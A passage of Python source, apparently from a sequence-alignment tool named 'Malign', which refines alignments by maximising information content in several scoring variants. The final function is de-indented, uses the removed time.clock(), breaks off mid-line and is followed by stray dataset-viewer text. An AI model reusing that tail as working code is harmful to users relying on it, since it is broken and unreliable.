                            w_heur_best = w_heur
                        if w_info_current == w_info_max and random.randint(0, 1) == 1:
                            # randomly pick between two equally good alignments
                            w_info_max = w_info_current
                            w_heur_best = w_heur
                        w_heur = np.zeros(mat_heur.shape, dtype='str')
    # Heuristic start done: w_heur_best holds the best consensus of the
    # 5 random sequences
    endtime_time = time.perf_counter()
    print("Heuristic start done. ", int(endtime_time - start_time), " seconds elapsed.")
    # First ("0th") pass: append individual sequences to the heuristic
    # consensus and optimise their offsets one at a time
    w_firstp = np.zeros([w_heur_best.shape[0] + 1, w_heur_best.shape[1]], dtype='str')
    for x in range(w_heur_best.shape[0]):
        for y in range(w_heur_best.shape[1]):
            w_firstp[x, y] = w_heur_best[x, y]
    w_firstp_info = 0
    w_firstp_info_max = 0
    wbest_firstp = np.zeros(w_firstp.shape, dtype='str')
    for s in range(2 * seq_slide + 1):
        # re-create the working matrix each shift (clearing just the
        # last row via w_firstp[-1, :] = "" does not behave as intended
        # for these '<U1' arrays)
        w_firstp = np.zeros([w_heur_best.shape[0] + 1, w_heur_best.shape[1]], dtype='str')
        for x in range(w_heur_best.shape[0]):
            for y in range(w_heur_best.shape[1]):
                w_firstp[x, y] = w_heur_best[x, y]
        for y in range(w_firstp.shape[1] - 2 * seq_slide):
            w_firstp[-1, s + y] = seq_matrix_w2[0, y + seq_slide]
        w_firstp_info = seq_info(seq_freq(w_firstp[:, seq_slide + left_gap:seq_slide + left_gap + seq_length]))
        if w_firstp_info > w_firstp_info_max:
            wbest_firstp = w_firstp
            w_firstp_info_max = w_firstp_info
    w_firstp = np.zeros([wbest_firstp.shape[0] + 1, wbest_firstp.shape[1]], dtype='str')
    for x in range(wbest_firstp.shape[0]):
        for y in range(wbest_firstp.shape[1]):
            w_firstp[x, y] = wbest_firstp[x, y]
    # append the remaining sequences one at a time, each at its best offset
    for z in range(1, seq_matrix_w2.shape[0]):
        w_firstp_info_max = 0
        w_firstp = np.zeros([wbest_firstp.shape[0] + 1, wbest_firstp.shape[1]], dtype='str')
        for s in range(2 * seq_slide + 1):
            w_firstp = np.zeros([w_firstp.shape[0], w_firstp.shape[1]], dtype='str')
            for x in range(wbest_firstp.shape[0]):
                for y in range(wbest_firstp.shape[1]):
                    w_firstp[x, y] = wbest_firstp[x, y]
            for n in range(w_firstp.shape[1]):
                w_firstp[-1, n] = ""
            for n in range(w_firstp.shape[1] - 2 * seq_slide):
                w_firstp[-1, s + n] = seq_matrix_w1[z, n]
            w_firstp_info = seq_info(seq_freq(w_firstp[:, seq_slide + left_gap:seq_slide + left_gap + seq_length]))
            if w_firstp_info > w_firstp_info_max:
                wbest_firstp = w_firstp
                w_firstp_info_max = w_firstp_info
    endtime_time = time.perf_counter()
    print("0th Pass Done. ", int(endtime_time - start_time), " seconds elapsed")
    # Remaining passes shuffle individual sequences placed above; the
    # first five rows (the heuristic seed) are dropped from the result
    w_nextp = np.zeros([wbest_firstp.shape[0] - 5, wbest_firstp.shape[1]], dtype='str')
    for x in range(w_nextp.shape[0]):
        for y in range(w_nextp.shape[1]):
            w_nextp[x, y] = wbest_firstp[x + 5, y]
    print_info = seq_info(seq_freq_orig(w_nextp[:, seq_slide + left_gap:seq_slide + left_gap + seq_length]))
    print("Starting information content is: ", print_info)
    wnextp_info_1 = seq_info(seq_freq_orig(w_nextp[:, seq_slide + left_gap:seq_slide + left_gap + seq_length]))
    wnextp_info_2 = wnextp_info_1  # initialise
    pass_counter = 0
    w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
    while True:
        wnextp_info_1 = wnextp_info_2  # previous pass's score
        pass_counter += 1
        for line in range(w_nextp.shape[0]):
            line_info = 0
            line_info_max = 0
            w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
            for s in range(2 * seq_slide + 1):
                # blank this sequence, then re-insert it at offset s
                for y in range(w_nextp.shape[1]):
                    w_nextp[line, y] = ""
                for y in range(seq_matrix_w1.shape[1]):
                    w_nextp[line, s + y] = seq_matrix_w1[line, y]
                line_info = seq_info(seq_freq(w_nextp[:, seq_slide + left_gap:seq_slide + left_gap + seq_length]))
                if line_info > line_info_max:
                    line_info_max = line_info
                    for v1 in range(w_nextp_best.shape[0]):
                        for v2 in range(w_nextp_best.shape[1]):
                            w_nextp_best[v1, v2] = w_nextp[v1, v2]
                # tie: keep either placement with probability 1/2
                if line_info == line_info_max and random.randint(0, 1) == 1:
                    line_info_max = line_info
                    for v1 in range(w_nextp_best.shape[0]):
                        for v2 in range(w_nextp_best.shape[1]):
                            w_nextp_best[v1, v2] = w_nextp[v1, v2]
            w_nextp = w_nextp_best
        wnextp_info_2 = seq_info(seq_freq_orig(w_nextp_best[:, seq_slide + left_gap:seq_slide + left_gap + seq_length]))
        print_info = seq_info(seq_freq_orig(w_nextp_best[:, seq_slide + left_gap:seq_slide + left_gap + seq_length]))
        endtime_time = time.perf_counter()
        print("Pass # ", int(pass_counter), " information content is: ", print_info, ". ", int(endtime_time - start_time), " seconds elapsed")
        # stop once the pass improved the score by less than the threshold
        if wnextp_info_2 < wnextp_info_1 * improvement_thresh and wnextp_info_2 > wnextp_info_1:
            break
    print("Sequence improvement threshold reached. Malign is stopping.")
    return(w_nextp_best)
def malign_iterate_sharp(matrix_input, improvement_thresh, seq_slide, left_gap, seq_length):
    '''
    Iteratively refine an existing alignment, scoring with
    seq_info_sharp.

    Each pass slides every sequence across all 2*seq_slide+1 offsets and
    keeps the placement maximising the "sharp" information score of the
    window [left_gap, left_gap+seq_length).  Stops when a pass improves
    the score by less than ``improvement_thresh`` or leaves it unchanged.

    :param matrix_input: 2-D string array, one (padded) sequence per row
    :returns: the optimised alignment matrix
    '''
    print("Malign Iterative: Sharp")
    # time.clock() was removed in Python 3.8; use perf_counter() instead
    start_time = time.perf_counter()
    # gaps[:, 0] = leading-gap offset ("register"); gaps[:, 1] = total gaps
    gaps = np.zeros([matrix_input.shape[0], 2])
    for line in range(matrix_input.shape[0]):
        register = 0
        line_gaps = 0
        while True:
            if matrix_input[line, register] == '':
                register += 1
            else:
                break
        for y in range(matrix_input.shape[1]):
            if matrix_input[line, y] == '':
                line_gaps += 1
        gaps[line, 0] = register
        gaps[line, 1] = line_gaps
    # condense: each sequence shifted left so its leading gaps are removed
    condense = np.zeros([matrix_input.shape[0], matrix_input.shape[1] - 2 * seq_slide], dtype='str')
    print(condense.shape)
    for x in range(condense.shape[0]):
        for y in range(condense.shape[1]):
            condense[x, y] = matrix_input[x, y + int(gaps[x, 0])]
    print(matrix_input.shape[0], " sequences")
    # working copy of the current alignment
    w_nextp = np.zeros(matrix_input.shape, dtype='str')
    for x in range(w_nextp.shape[0]):
        for y in range(w_nextp.shape[1]):
            w_nextp[x, y] = matrix_input[x, y]
    wnextp_info_1 = seq_info_sharp(seq_freq_orig(w_nextp[:, int(seq_slide + left_gap):int(seq_slide + left_gap + seq_length)]))
    print_info = seq_info(seq_freq_orig(w_nextp[:, seq_slide + left_gap:seq_slide + left_gap + seq_length]))
    print("Starting information content is: ", print_info)
    wnextp_info_2 = wnextp_info_1  # initialise
    pass_counter = 0
    w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
    while True:
        wnextp_info_1 = wnextp_info_2  # previous pass's score
        for line in range(w_nextp.shape[0]):
            line_info = 0
            line_info_max = 0
            w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
            for s in range(2 * seq_slide + 1):
                # blank this sequence, then re-insert it at offset s
                for y in range(w_nextp.shape[1]):
                    w_nextp[line, y] = ""
                for y in range(condense.shape[1]):
                    w_nextp[line, s + y] = condense[line, y]
                line_info = seq_info_sharp(seq_freq(w_nextp[:, int(seq_slide + left_gap):int(seq_slide + left_gap + seq_length)]))
                if line_info > line_info_max:
                    line_info_max = line_info
                    for v1 in range(w_nextp_best.shape[0]):
                        for v2 in range(w_nextp_best.shape[1]):
                            w_nextp_best[v1, v2] = w_nextp[v1, v2]
                # tie: keep either placement with probability 1/2
                if line_info == line_info_max and random.randint(0, 1) == 1:
                    line_info_max = line_info
                    for v1 in range(w_nextp_best.shape[0]):
                        for v2 in range(w_nextp_best.shape[1]):
                            w_nextp_best[v1, v2] = w_nextp[v1, v2]
            w_nextp = w_nextp_best
        wnextp_info_2 = seq_info_sharp(seq_freq_orig(w_nextp_best[:, int(seq_slide + left_gap):int(seq_slide + left_gap + seq_length)]))
        print_info = seq_info(seq_freq_orig(w_nextp_best[:, seq_slide + left_gap:seq_slide + left_gap + seq_length]))
        pass_counter += 1
        endtime_time = time.perf_counter()
        print("Pass # ", int(pass_counter), " information content is: ", print_info, ". ", int(endtime_time - start_time), " seconds elapsed")
        # stop on below-threshold improvement, or when the score is unchanged
        if wnextp_info_2 < wnextp_info_1 * improvement_thresh and wnextp_info_2 > wnextp_info_1:
            break
        if wnextp_info_2 == wnextp_info_1:
            break
    print("Sequence improvement threshold reached. Malign Iterative: Sharp is stopping.")
    return(w_nextp_best)
def malign_iterate_sharper(matrix_input, improvement_thresh, seq_slide, left_gap, seq_length):
    '''
    Iteratively refine an existing alignment, scoring with
    seq_info_sharper.

    Identical in structure to malign_iterate_sharp but uses the
    "sharper" information score.  Also dumps the incoming alignment to
    ``matrix_input.txt`` (gaps shown as '-') as a debugging aid.
    Stops when a pass improves the score by less than
    ``improvement_thresh`` or leaves it unchanged.

    :param matrix_input: 2-D string array, one (padded) sequence per row
    :returns: the optimised alignment matrix
    '''
    print("Malign Iterative: SharpER")
    print("matrix input shape = ", matrix_input.shape)
    print("seq_length = ", seq_length)
    # debugging aid: dump the incoming alignment, one row per line
    with open("matrix_input.txt", "w") as f:
        for x in range(matrix_input.shape[0]):
            for y in range(matrix_input.shape[1]):
                if matrix_input[x, y] == '':
                    f.write("-")
                else:
                    f.write(matrix_input[x, y])
            f.write("\n")
    # time.clock() was removed in Python 3.8; use perf_counter() instead
    start_time = time.perf_counter()
    # gaps[:, 0] = leading-gap offset ("register"); gaps[:, 1] = total gaps
    gaps = np.zeros([matrix_input.shape[0], 2])
    for line in range(matrix_input.shape[0]):
        register = 0
        line_gaps = 0
        while True:
            if matrix_input[line, register] == '':
                register += 1
            else:
                break
        for y in range(matrix_input.shape[1]):
            if matrix_input[line, y] == '':
                line_gaps += 1
        gaps[line, 0] = register
        gaps[line, 1] = line_gaps
    # condense: each sequence shifted left so its leading gaps are removed;
    # width is the unpadded sequence length
    condense = np.zeros([matrix_input.shape[0], matrix_input.shape[1] - 2 * seq_slide], dtype='str')
    print("condense shape = ", condense.shape)
    for x in range(condense.shape[0]):
        for y in range(condense.shape[1]):
            condense[x, y] = matrix_input[x, y + int(gaps[x, 0])]
    print(matrix_input.shape[0], " sequences")
    # working copy of the current alignment
    w_nextp = np.zeros(matrix_input.shape, dtype='str')
    for x in range(w_nextp.shape[0]):
        for y in range(w_nextp.shape[1]):
            w_nextp[x, y] = matrix_input[x, y]
    wnextp_info_1 = seq_info_sharper(seq_freq_orig(w_nextp[:, int(seq_slide + left_gap):int(seq_slide + left_gap + seq_length)]))
    print_info = seq_info(seq_freq_orig(w_nextp[:, seq_slide + left_gap:seq_slide + left_gap + seq_length]))
    print("Starting information content is: ", print_info)
    wnextp_info_2 = wnextp_info_1  # initialise
    pass_counter = 0
    w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
    while True:
        wnextp_info_1 = wnextp_info_2  # previous pass's score
        for line in range(w_nextp.shape[0]):
            line_info = 0
            line_info_max = 0
            w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
            for s in range(2 * seq_slide + 1):
                # blank this sequence, then re-insert it at offset s
                for y in range(w_nextp.shape[1]):
                    w_nextp[line, y] = ""
                for y in range(condense.shape[1]):
                    w_nextp[line, s + y] = condense[line, y]
                line_info = seq_info_sharper(seq_freq(w_nextp[:, int(seq_slide + left_gap):int(seq_slide + left_gap + seq_length)]))
                if line_info > line_info_max:
                    line_info_max = line_info
                    for v1 in range(w_nextp_best.shape[0]):
                        for v2 in range(w_nextp_best.shape[1]):
                            w_nextp_best[v1, v2] = w_nextp[v1, v2]
                # tie: keep either placement with probability 1/2
                if line_info == line_info_max and random.randint(0, 1) == 1:
                    line_info_max = line_info
                    for v1 in range(w_nextp_best.shape[0]):
                        for v2 in range(w_nextp_best.shape[1]):
                            w_nextp_best[v1, v2] = w_nextp[v1, v2]
            w_nextp = w_nextp_best
        wnextp_info_2 = seq_info_sharper(seq_freq_orig(w_nextp_best[:, int(seq_slide + left_gap):int(seq_slide + left_gap + seq_length)]))
        print_info = seq_info(seq_freq_orig(w_nextp_best[:, seq_slide + left_gap:seq_slide + left_gap + seq_length]))
        pass_counter += 1
        endtime_time = time.perf_counter()
        print("Pass # ", int(pass_counter), " information content is: ", print_info, ". ", int(endtime_time - start_time), " seconds elapsed")
        # stop on below-threshold improvement, or when the score is unchanged
        if wnextp_info_2 < wnextp_info_1 * improvement_thresh and wnextp_info_2 > wnextp_info_1:
            break
        if wnextp_info_2 == wnextp_info_1:
            break
    print("Sequence improvement threshold reached. Malign Iterative: SharpER is stopping.")
    return(w_nextp_best)
def malign_iterate(matrix_input, improvement_thresh, seq_slide, left_gap, seq_length):
print("Malign Iterative")
start_time = time.clock()
gaps = np.zeros([matrix_input.shape[0], 2]) #stores register and total gaps
for line in range(matrix_input.shape[0]):
register = 0
line_gaps = 0
while True:
if matrix_input[line, register]=='':
register += 1
else:
break
for y in range(matrix_input.shape[1]):
if matrix_input[line, y]=='':
line_gaps += 1
gaps[line, 0] = register
gaps[line, 1] = line_gaps
condense = np.zeros([matrix_input.shape[0], matrix_input.shape[1]-2*seq_slide], dtype='str')
for x in range(condense.shape[0]):
for y in range(condense.shape[1]):
condense[x, y] = matrix_input[x, y+int(gaps[x,0])]
#seq_slide = gaps[0,1]
print(matrix_input.shape[0], " sequences")
w_nextp = np.zeros(matrix_input.shape, dtype='str')
for x in range(w_nextp.shape[0]):
for y in range(w_nextp.shape[1]):
w_nextp[x, y] = matrix_input[x, y]
wnextp_info_1 = seq_info(seq_freq_orig(w_nextp[:, int(seq_slide+left_gap):int(seq_slide+left_gap+seq_length)])) ###
print_info = seq_info(seq_freq_orig(w_nextp[:, seq_slide+left_gap:seq_slide+left_gap+seq_length]))
print("Starting information content is: ", print_info)
wnextp_info_2 = wnextp_info_1 #Initialize variable
pass_counter = 0
w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
while True:
wnextp_info_1 = wnextp_info_2 #Set old value to 'new' value from previous pass
for line in range(w_nextp.shape[0]):
line_info = 0
line_info_max = 0
w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
for s in range(2*seq_slide+1):
for y in range(w_nextp.shape[1]):
w_nextp[line, y] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.